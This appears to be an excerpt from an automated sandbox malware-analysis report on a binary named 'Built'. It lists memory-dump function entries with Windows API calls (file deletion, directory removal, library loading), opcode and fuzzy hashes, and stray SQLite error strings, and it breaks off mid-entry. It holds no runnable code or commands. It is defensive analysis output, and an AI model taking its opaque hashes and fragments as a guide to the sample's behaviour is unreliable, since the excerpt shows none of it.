                                                                      • Instruction Fuzzy Hash: 92314821E2C243C5FA24BB6594613B99391AF45385FC45038ED0E5BED3FF6DA805CA35
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                                      • Instruction ID: 39cb791920302ef4c6ae9983d04cfcaeaa8e7c8e5090be18153ca7926446163f
                                                                      • Opcode Fuzzy Hash: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                                      • Instruction Fuzzy Hash: 1051C661B2E242C6F628BE25940067AE291BF44BB4F944639DE7D47BD7EE3CD4418E30
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2067833752.00007FFE10241000.00000040.00000001.01000000.00000019.sdmp, Offset: 00007FFE10240000, based on PE: true
                                                                      • Associated: 00000003.00000002.2067786315.00007FFE10240000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2067833752.00007FFE1025E000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2067833752.00007FFE10268000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2068013590.00007FFE1026B000.00000080.00000001.01000000.00000019.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2068045178.00007FFE1026D000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffe10240000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: 00007
                                                                      • String ID:
                                                                      • API String ID: 3568877910-0
                                                                      • Opcode ID: c5b90022c78a2eeec152cd39a3856e411d0435bc5f328ad14cd6804bf13d6347
                                                                      • Instruction ID: 448d5307b7ab3f22d0b06a6d263bace57a5b3f81864c3befb0be310c60236b29
                                                                      • Opcode Fuzzy Hash: c5b90022c78a2eeec152cd39a3856e411d0435bc5f328ad14cd6804bf13d6347
                                                                      • Instruction Fuzzy Hash: 63214C32B18E55C6EB64DB1BA904729AAA1FB84BA0F589070CF4D83B65DF38E505C600
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastPointer
                                                                      • String ID:
                                                                      • API String ID: 2976181284-0
                                                                      • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                      • Instruction ID: cb5bd3e4cc8b5e057e8bd0dc03b2afb35d142b7d9d3466d5b2ead6f6e8cfeb58
                                                                      • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                      • Instruction Fuzzy Hash: BD11C461A2CB81C1DB10FB25B554169A362AB48BF4F940331EE7D07BEAEE7CD1508754
                                                                      APIs
                                                                      • CloseHandle.KERNEL32(?,?,?,00007FF76D5D9CE5,?,?,00000000,00007FF76D5D9D9A), ref: 00007FF76D5D9ED6
                                                                      • GetLastError.KERNEL32(?,?,?,00007FF76D5D9CE5,?,?,00000000,00007FF76D5D9D9A), ref: 00007FF76D5D9EE0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: CloseErrorHandleLast
                                                                      • String ID:
                                                                      • API String ID: 918212764-0
                                                                      • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                      • Instruction ID: 8d565cfb5897365f9796d3209cef660bede627e37ac01b6aa85e6b445627a1bf
                                                                      • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                      • Instruction Fuzzy Hash: 4021C211F3C64280EA54B761A4B037C92929F847A0F841235DD3E47AD3EE6CA5808739
                                                                      APIs
                                                                      • HeapFree.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C6E
                                                                      • GetLastError.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C78
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 485612231-0
                                                                      • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                      • Instruction ID: 745cbc7dc603e88975c203fe418b648da96f7ad396c209a091e6561646013309
                                                                      • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                      • Instruction Fuzzy Hash: 5FE04F10F2C647C2FB187BB1646517992915F9C782B804030CD1D42A63FE2C68854634
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                      • Instruction ID: f1c944ae47175a2a0f962628a90659ba0569bec227d3d93f9a77630d06030a33
                                                                      • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                      • Instruction Fuzzy Hash: 4F41E63292C201C7EB24BF15A56127DB3A1EB56B80F540131DEAE43A96EF3DE402C775
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _fread_nolock
                                                                      • String ID:
                                                                      • API String ID: 840049012-0
                                                                      • Opcode ID: 3f33f4ea907401e71e1cd8312c1a8899cf969a241791d9adefff38a5321dfa8e
                                                                      • Instruction ID: d5ef1775c7c8e26880a6c61200d845f6e558b49e5e7d89331b1a3fb069e53926
                                                                      • Opcode Fuzzy Hash: 3f33f4ea907401e71e1cd8312c1a8899cf969a241791d9adefff38a5321dfa8e
                                                                      • Instruction Fuzzy Hash: D3219121F2D65685FA10BA16A9043BAE691BF49BD4FC85434DD1D07F83EEBDE041CA30
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                      • Instruction ID: bcafe4651ad1ef7a36ab0a2c0a6fafa4312909ee39c45119d71527b8008a285c
                                                                      • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                      • Instruction Fuzzy Hash: 8431A421E2C645C2F7117B15846177EA650AB64BA1F910135ED3D13BE3EFBCE4818739
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                      • Instruction ID: 0fda83ee3f10ff6cd6216f0a38b5fca5da58ddacb1e294859f870b8c1bbb622d
                                                                      • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                      • Instruction Fuzzy Hash: 4C118421A2D682C1EA61BF55942017EE264FF56B80FC44431EEAC57E9BEF3CD4408778
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                      • Instruction ID: eef46f1205c2529964929e8f807375d1985ad6d3f4f67a09118ebfc87a25112a
                                                                      • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                      • Instruction Fuzzy Hash: 1821A732A2C681C7DB61AF28D450379B7A0EB98B94F944234DE6D47ADAEF3CD440CB10
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                      • Instruction ID: c75a6dcb5963d74dfd2af19718cdedb5d1ea1223bc91fda18a02d6881dabb32b
                                                                      • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                      • Instruction Fuzzy Hash: 9201A521B2C74281E904BB565900079E6D5AB55FE0F884635DE6C13FD7EE3CE4028B20
                                                                      APIs
                                                                        • Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9
                                                                      • LoadLibraryExW.KERNEL32(?,00007FF76D5C5C06,?,00007FF76D5C308E), ref: 00007FF76D5C81C2
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharLibraryLoadMultiWide
                                                                      • String ID:
                                                                      • API String ID: 2592636585-0
                                                                      • Opcode ID: 99459516253cb9cb4854e4c73e6f2a87dddee0b16df49a4a0f63266b22594f97
                                                                      • Instruction ID: 4effe748868b8922675d2d9f8a30c6026713996656d5f0eb839c0dd0b088986c
                                                                      • Opcode Fuzzy Hash: 99459516253cb9cb4854e4c73e6f2a87dddee0b16df49a4a0f63266b22594f97
                                                                      • Instruction Fuzzy Hash: E4D08C11B2829181EA48BBA7AA4657995519B8EBC0F888034EE6C03B46EC3CC0800B14
                                                                      APIs
                                                                      • HeapAlloc.KERNEL32(?,?,00000000,00007FF76D5DA63A,?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A), ref: 00007FF76D5DDEFD
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: AllocHeap
                                                                      • String ID:
                                                                      • API String ID: 4292702814-0
                                                                      • Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                      • Instruction ID: 0dc7e60e3cb84121f66f2fc7a58aad7618ffb42e11caa45fe7b353c5592a7cc8
                                                                      • Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                      • Instruction Fuzzy Hash: 40F04F55B2D347C0FE64766558313B5A2909F98B80FC84031CD1E86B87FD2CA4814634
                                                                      APIs
                                                                      • HeapAlloc.KERNEL32(?,?,?,00007FF76D5CFFB0,?,?,?,00007FF76D5D161A,?,?,?,?,?,00007FF76D5D2E09), ref: 00007FF76D5DC94A
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: AllocHeap
                                                                      • String ID:
                                                                      • API String ID: 4292702814-0
                                                                      • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                      • Instruction ID: 93b2e833fcd6504b7b8eebb542a3306ea0106ff146cd5c7e8bd45f97efccf994
                                                                      • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                      • Instruction Fuzzy Hash: CAF0DA11E3D247C5FE547B61596127991805F4CBA0F884630ED3E45ACBFE6CB5418634
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true
                                                                      • Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $-$-$-$:$:$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff
                                                                      • API String ID: 0-2549712616
                                                                      • Opcode ID: 353726e22626a36420e9d36d6d2fee7df0cbaefdbf38681664d95024bd46e1d7
                                                                      • Instruction ID: c80dfe3d00f8cc129d00af29388873a14000c23a4c598f025c658b4786e12e3e
                                                                      • Opcode Fuzzy Hash: 353726e22626a36420e9d36d6d2fee7df0cbaefdbf38681664d95024bd46e1d7
                                                                      • Instruction Fuzzy Hash: 0D812897B201948BF759C67EF822FDD1B9593A0348F444139EA40CFBC7E92EE6028742
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true
                                                                      • Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: 00007E133019
                                                                      • String ID: Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)$Failed to read ptrmap key=%d$Main freelist: $Page %d is never used$Pointer map page %d is referenced$incremental_vacuum enabled with a max rootpage of zero$max rootpage (%d) disagrees with header (%d)
                                                                      • API String ID: 3999650332-2103957143
                                                                      • Opcode ID: d124005af4a007284df854872ffb4612a4a600e5c771297b311b7b1fef60c5b7
                                                                      • Instruction ID: 0962f85053b1dd1696b25ea1fc13c7d1628a12ea0d68329b430896c4f4be948a
                                                                      • Opcode Fuzzy Hash: d124005af4a007284df854872ffb4612a4a600e5c771297b311b7b1fef60c5b7
                                                                      • Instruction Fuzzy Hash: A6127C3AB086428AEB56CB69D464AFD77A1FB44744F14013ADA6D47BE8CFBCE445C700
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7A1B
                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7A9E
                                                                      • DeleteFileW.KERNEL32(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7ABD
                                                                      • FindNextFileW.KERNEL32(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7ACB
                                                                      • FindClose.KERNEL32(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7ADC
                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7AE5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                      • String ID: %s\*$[oV116
                                                                      • API String ID: 1057558799-4178782411
                                                                      • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                      • Instruction ID: 4d27f3747f592dbf4448ab11a96f07e34a2859e872720d56c8b21394b52ae8b4
                                                                      • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                      • Instruction Fuzzy Hash: 06416321E2CA42D5EB30BB24E8445B9A361FB98754FC40636DD5D42E96FF3CD64A8B30
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true
                                                                      • Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
